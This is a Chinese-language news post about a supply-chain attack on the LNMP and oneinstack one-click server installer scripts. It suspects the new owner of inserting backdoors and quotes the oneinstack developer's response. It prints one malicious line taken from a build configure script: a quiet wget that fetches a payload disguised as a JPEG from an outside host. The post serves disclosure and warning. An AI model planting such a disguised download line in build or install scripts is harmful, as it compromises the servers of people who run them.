9月下旬,國內安全公司發現知名Web整合環境安裝指令碼 “lnmp一鍵安裝包” 被投毒,開發者、站長、企業IT管理員下載的一鍵安裝包被加了後門程式。
當時我們都以為這是LNMP一鍵安裝包的伺服器被黑了,不過後來有網友發現LNMP 一鍵安裝包已經被金華市矜貴網路科技有限公司(下稱金華矜貴)收購。
而關於安裝包被投毒問題金華矜貴沒有釋出任何宣告,LNMP論壇的發帖也遭到管理員刪除。
現在來看這並不是伺服器被黑了,因為被金華矜貴收購的另一個整合環境安裝指令碼 oneinstack 也被發現投毒,所以情況很明瞭了:
那就是根本不是伺服器被黑,而是他們自己在指令碼里插入了惡意程式碼主動投毒,用來下載某些惡意軟體,進而可以控制大量網站或伺服器,但具體目的尚不清楚。
目前在 GitHub 和 V2EX 上已經有帖子在討論這件事,鑑於金華矜貴還試圖收購秋水逸冰的 lamp.sh 一鍵安裝包 (但被秋大拒絕了),他們後續可能還會盯上其他一鍵安裝包,因此建議大家不要再使用這類一鍵安裝包,否則自己的網站或伺服器可能也會變成肉雞。
oneinstack 開發者回應稱:金華市矜貴網路科技有限公司收購現有的幾個皮膚以及安裝包主要是為了佈局類似寶塔的產品。想依賴 oneinstack 開啟知名度。公司作為專案的投資商。協商的協議為公司為專案提供開發資金,並提供所有伺服器資源。但是專案的管理許可權以及運維許可權都在我手中。目前各位開發者的精力主要是進行新的皮膚開發,對於出現本次被掛馬事故主要原因在於我們沒有對專案進行及時的管理。後續會加強安全措施。杜絕該問題的出現。
惡意程式碼隱藏在圖片裡
pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg
GitHub討論地址
https://github.com/oneinstack/oneinstack/issues/511
如果你最近使用過 LNMP 一鍵安裝包、oneinstack、WDCP 之類的部署過環境,建議直接重灌系統。
【原文連結】【威脅情報】繼LNMP後oneinstack也被新增了後門!
本作品採用《CC 協議》,轉載必須註明作者和本文連結